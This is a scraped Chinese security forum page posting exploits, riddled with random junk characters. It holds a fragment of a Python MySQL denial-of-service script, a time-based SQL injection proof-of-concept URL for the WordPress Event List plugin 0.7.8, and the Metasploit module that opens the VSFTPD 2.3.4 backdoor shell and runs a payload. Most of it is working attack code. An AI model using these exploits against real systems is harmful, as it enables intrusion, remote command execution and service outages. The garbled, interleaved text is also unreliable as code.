    0 Q7 Z  O4 S5 }) F; R
    9 d8 f9 v6 k+ \def main():; Q# \; P3 k# m/ n
    if len(sys.argv) != 2:
    ; g8 l6 S  U! a7 V( Y/ iusage()
    . z. ~5 k. R. B, s+ E9 osys.exit()
    + q) h3 X  E0 L1 @% O( V# Xs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)" o: N- d4 j- k7 K( \. N2 {
    % M' ?' c% Y! F
    HOST = sys.argv[1]
    ( R' `' r4 v3 m. z/ B3 h: z7 ~PORT = int(3306)& B8 ^: w& D* k
    s.connect((HOST,PORT))
    & S6 a7 U5 O8 L. u0 }  A& F  ?print "
  • Connect"
    . ~6 I* {8 ]0 q# h- r2 @& Ps.send(buf)
    $ o2 a! |! s4 \$ J3 xprint "
  • Payload 1 sent"% ~( z6 t$ ^! d$ g1 a
    s.send(buf2)
    $ S6 t  e% y4 H9 Q: }print "
  • Payload 2 sent( \2 G4 n- W* A# m
    ", "
  • Run again to ensure it is down..- \4 w7 i1 ^/ B! ~
    "
    " b8 X4 O* F' P+ i, bs.close()
    # [8 L4 y/ x% ^5 M
    2 {2 L$ |' B! [, n2 ?' M; n! eif __name__ == "__main__":
    & _5 E+ x. u! d6 o- M9 c: H1 w2 jmain()* D# s+ Q7 ~* c, k( }  o" r: @
    ( ?: P) C+ b2 p& K
    ' P; ?, R. H& m: [" s) _) M

    % l# G$ }' V! f. s& A
    4 x* ~* u- j0 n! |% ]8 Y0 k/ C5 Q* D" J
    , n2 g  T, J/ Q0 [3 f) j; Q3 y
    * j! P3 U: ?+ D* J$ o' [
    7 k+ U" D4 B& F/ g. k6 p$ X
    - Q2 z& g& T6 a9 d
    8 y9 L7 @: N  `3 N  V
    7 R' o5 d$ ?) F8 e% F

    4 J1 Z$ G% S: l8 I$ K
    " i! z, J& X3 R1 a9 h5 O+ [. P: W& o4 s& B- f

    + a: A' S' O/ C) ^- ?: Q! H3 t1 i/ Y" I8 B* J

      [) z, G2 e8 r# X# X9 s4 W
    7 C3 ?# D1 {* q# B( b公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:1 M  G/ d2 v/ G0 D0 v
      $ B: k/ Q/ E7 H) F
         . k8 J0 i6 r: [3 K
      
      A2 J+ I4 t5 h5 ?- x8 K+ `+ wSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    - d* Q$ T  {. p6 T( J( v# S+ jallows an authenticated user to execute arbitrary SQL commands via the id  d- p+ M) z7 J5 J$ {
    parameter to wp-admin/admin.php.
    . ?( F# D0 R  }7 M+ v& v  
    ( B% `  N1 E' b   * D% Y+ e" D/ ^, ^1 T9 b* B
      
    4 z. x4 r6 u! u/ x2. Proof of Concept:
    ; l4 Z1 B2 L0 a- y! w; o0 ?  8 y. x. H' N8 _) \
       
    # g0 m$ g: f! V; Y3 {1 X/ c$ {  
    , y: t5 B$ L1 r$ |% K5 ~http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id5 Y: N9 k) c, \$ [4 m1 h
    =1 AND SLEEP(10)
    : Z! e% U+ L- `% P# m2 y  u
    ' d4 O" ?" S- V" T5 ~) a/ Y  8 L5 e5 b; \$ f4 t# r, P- f5 V
       
    ' w# t& d& e2 y/ q0 X0 H& g  ( W8 Y6 J- v' D  v; x& D$ X
    3. Solution:, b6 l+ g' H! }0 w- S7 t9 b
      ( c. ]; P, n' R
         
    " ~' }4 |& a- j: B; u. S  
    % F5 L5 `, D# }& LThe plugin has been removed from WordPress. Deactivate the plug-in and wait
    , ?2 B" }, U0 F9 Z+ afor a hotfix.  h8 e, y+ v5 `/ x
      
    & Q, J, T, c" _4 J# F3 b   1 B. r9 |' a" C6 T
      4 C. B$ f1 }, b; i/ z' R! O
    4. Reference:
    ! ~. x* z7 j- ^% B& n: W  * [0 I& p4 H/ O, C  N
       
    + U8 q# }0 |6 ]  R1 `; ?  5 x( m" V# p7 ]) o
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje/ p" {2 b7 s1 P, g) `. Z
    ction-sqli/6 K: A- }9 l, q' }3 @0 `
      ! v' C& r. D9 v* t
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429+ R8 h$ @7 J9 R

    9 \. A" [8 L9 N$ j6 v+ K1 k' A* n. Q) {. _( D$ C8 i, @

    ) |" H. f7 @/ G
    & [5 i' i; R4 D5 Z! L9 }/ a) X4 J6 V  Z* ]5 v$ i

    : V& c3 y5 y! g# }
    " _7 X  l" I  ~+ }
    9 S1 v" `$ h9 W$ W. H
    * u3 r$ l. E3 M7 D2 l8 D. O- a( X$ f# |- }% B0 u
    : U9 V, `* h/ \, j; J

    6 ^' _) I! a( {1 Y4 R6 F& U0 D+ U' M' |' L
    . @9 Y( o" O4 _: C

      V9 B: w$ v! v, K: f) l6 }& ?. t7 y* }1 F7 _0 T
    # B6 ^/ @+ o1 W# l* X8 f: g
    1 g6 U, }6 c  w  a/ Z
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################/ F/ X* q$ d3 ~

    4 N# e6 v0 u9 x) R# [& c2 W1 n  c0 p6 f

      E7 j6 d6 q+ {3 i  h# vrequire msf/core& ~5 ?# L9 f8 N, d

    * I& Z& y4 o7 ^6 a$ J8 e& R) Xclass Metasploit3 < Msf::Exploit::Remote1 p) D+ _. P7 o) v
    Rank = ExcellentRanking
    4 D* y* `/ v) F& \% F7 C
    6 y2 r( n; j7 c  \8 oinclude Msf::Exploit::Remote::Tcp
    - J. z1 N( Y$ j; y4 \/ N
    2 t( X6 ?) c* Udef initialize(info = {})
    + h' P: a; \' r$ p) Y( t# {super(update_info(info; p' A/ G' c$ S2 b; G
    Name => VSFTPD v2.3.4 Backdoor Command Execution! [) }# k2 [& O5 f  ^8 Y. a5 l- T
    Descript_ion => %q{
    9 S/ B) p; o* {; y! Z$ ~) {6 vThis module exploits a malicious backdoor that was added to the VSFTPD download. l" E5 f& F* f2 R2 I
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between! ]* s8 K7 I3 _
    June 30th 2011 and July 1st 2011 according to the most recent information9 G# ~6 F6 y3 ]
    available. This backdoor was removed on July 3rd 2011./ A3 L( v+ U+ y
    }
    " A) I: ^! W  O2 Y5 t5 m- jAuthor => [ hdm mc ]
    ( F& C. O6 ~0 p. {4 tLicense => MSF_LICENSE
    * k/ p- L! @" f! P( Y' }Version => $Revision: 13099 $
    & O' _3 d$ D- N8 N: U* TReferences =>0 G3 S* x, b3 n: N' Z. @+ h
    [
    3 P# D  Y7 C" b- S9 |[ URL http://pastebin.com/AetT9sS5]% M. {0 M. k- y1 e9 V. ]7 w
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    . S1 R' Q! _- [1 p]
    % e0 d/ z& O- @& B: C, KPrivileged => true
    2 A; ]8 y! x1 [Platform => [ unix ]
    ( I) @7 `8 Q: k1 b% i$ O( L2 V) dArch => ARCH_CMD$ G( P, I: C3 T4 Q0 z
    Payload =>
    6 e% K/ _# g9 t3 A6 s{
    . c$ D3 n& Q$ H# K5 m* uSpace => 20008 H' j- B: \! B, |
    BadChars =>
    * ^/ R" Q$ Z! ]' ]4 c$ NDisableNops => true
    1 N# i- D0 ?  h7 cCompat =>. K2 x2 _, I8 u+ D
    {
    ' Y* F) R8 K* pPayloadType => cmd_interact# H$ d5 _2 `+ @6 q
    ConnectionType => find$ }$ [8 u/ t. u3 W: H' A, u
    }
    % G  M' C+ P) D% C6 S9 m}
    8 @% l3 J; Q& v! V8 a: x/ K+ YTargets =>
    9 q, e# X- S! s! n, N: r* d[
    ! Z- @( |! S/ H2 X[ Automatic { } ]$ ?/ X* ^7 i0 B% T
    ]
      ~$ E% ^5 G8 k! UDisclosureDate => Jul 3 2011
    * E' _% a, g8 i7 G% I$ BDefaultTarget => 0))
      A; [* h7 D* l0 H# a* }( h* b# o& o
    register_options([ Opt::RPORT(21) ] self.class)' c% J$ h8 z4 q2 a( o5 b
    end8 T3 Y+ W# _* S3 {4 q# F

    $ M. A: s- ~: b' ], Qdef exploit# B0 d* N( L; F3 S- S! |

    ( b& E! x3 M; K, ~nsock = self.connect(false {RPORT => 6200}) rescue nil" z, i/ q+ w# U- E2 n; y4 X/ s2 J* Q
    if nsock2 s' T/ N5 Y6 Y
    print_status(The port used by the backdoor bind listener is already open)2 S8 J+ a& C+ f4 b9 e% }0 t
    handle_backdoor(nsock)8 {' @  P1 V6 ~
    return
    : i1 t- F8 n# A+ bend  e  q" c& H' h, E

    5 M& p/ s. z& ~0 T& w# d# X( M/ c# Connect to the FTP service port first8 u$ {! |: y4 z: ^
    connect) E/ S" C+ e0 V$ {0 ^
    ; S. D% R% u1 H" o1 f
    banner = sock.get_once(-1 30).to_s
    3 I7 L3 W; c* B- A9 b2 ?print_status(Banner: #{banner.strip})( k$ v5 B  ]( X1 {

    9 N  m' B. e5 {4 _- `* k+ x3 }sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    ; o# I! h2 n- V6 J)
    0 v/ E! R* H$ x8 @% yresp = sock.get_once(-1 30).to_s
    & k6 v- w0 g1 z2 R9 y2 u' Vprint_status(USER: #{resp.strip})
    & u  e# G, g; ~+ T: ~2 H2 s; C
    # i) a7 H6 _9 `if resp =~ /^530 /9 {* Z) h8 ^  F% {& }
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    7 E, K  Z, i% Y" _disconnect
    0 M" t. o; R! F" ?+ ^% R8 r8 Mreturn. @+ B5 p5 O  U+ W5 ^0 {
    end
    ; f  a7 B$ |" k7 H/ k! E
    1 v* ?2 J6 Y- k$ t5 Y7 x% Yif resp !~ /^331 /' G& J1 N% E( H* y+ D
    print_error(This server did not respond as expected: #{resp.strip})
    % h8 J$ f: K* W+ I* {disconnect
    - P- |# d2 `) O# T% Rreturn
    3 @! x$ i2 n1 ]# H6 qend6 G. t) y2 q1 S
    ( V" B; H, i& W7 n( l7 m
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}; t( `  j( j6 q7 y9 r
    )
    6 J; w8 M, a: {4 i7 Q/ N- S/ p' N
    9 S' u7 Y! e" a7 m: i, a# Do not bother reading the response from password just try the backdoor
    ) D  O7 h( A  m4 S8 i( a9 qnsock = self.connect(false {RPORT => 6200}) rescue nil
    ; d) a8 U; S9 B; b2 Wif nsock5 o7 q2 y7 u0 f3 B" f5 ~
    print_good(Backdoor service has been spawned handling...)* K; W3 f$ P8 l  |$ ~4 {
    handle_backdoor(nsock)) Y) b0 r: v4 j7 t" L% l* ~
    return
    : V$ Q( L/ m7 A4 nend
    ! O, ?6 e; v1 Q3 p2 s) I3 v" y2 }8 C& I1 G! n2 k6 z& p- s( X. w+ W! H
    disconnect
    2 c3 c0 t# N6 Q5 C3 G1 D
    ( u9 i/ G+ ^' {1 k! W6 z2 a5 p. V) `end: H( S/ x7 D: G) z! F
    6 c5 D. {1 Y; S, c& S& ^
    def handle_backdoor(s)
    . |! |, d- g4 i8 x7 T& N9 k5 @1 _% W* ?& p# Z5 J
    s.put(id" B! O9 D# {+ z% [, \
    )
    ' t2 v; q/ n/ ^" U& b, _& f) N/ T8 x, B/ a4 P. W' u
    r = s.get_once(-1 5).to_s
    , i: U& h8 G0 v. _% _if r !~ /uid=/
    . ?  S" C0 A9 W  @print_error(The service on port 6200 does not appear to be a shell)4 s# N/ s) [5 v+ r% Q
    disconnect(s)/ J: s  Z, E* E$ X
    return
    " O  P# b# j$ Eend
    ' ^& C1 Y+ ]7 r9 ~4 ~( y5 j- o2 n: K5 g
    print_good(UID: #{r.strip})2 {; [7 y2 g9 e; I/ \3 v% d9 F9 ]7 ^$ Z

    $ Y5 R/ J9 C: a. ss.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    6 H8 R5 p1 W- C! ]' Khandler(s)! d) T* i9 Y4 ?" d6 R' \/ M- H
    end
    9 h/ L2 F  w! k" D' W- w$ f+ f0 p! u7 ?
    end复制代码
    0 w8 S% V6 f. K: H6 d) M3 Z+ }$ s1 G+ q3 S

    . |, D9 o, [9 }3 l0 U9 D% N' d
    ! {* Z! T. I8 _; V/ T# @2 i0 O! G
    # G% k4 X( D, m  @9 ~2 |+ p! F2 C. N. v$ N

    ' \; }7 ^$ O  z% I  _# E6 Q* k/ Z& m* w6 u
    5 r+ I) F) `, x1 b& P

    ( l; ^( P6 U( P) Y
    1 {' g- y4 F, w& U# n8 W/ w! p1 X  r
    1 C, h8 d! j) g8 Y( B0 x# h

    " |# {* k1 G" d
    ' t3 [/ Y$ ], z4 C4 V6 J
    . U+ n: F7 B% l, z$ F8 N- ^2 q1 C9 D7 M7 W: A; J6 ^9 M0 T

      j2 O2 Y* d& \4 C+ U% @/ V0 D, K0 r9 {2 E; m0 M9 `% Z  n
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表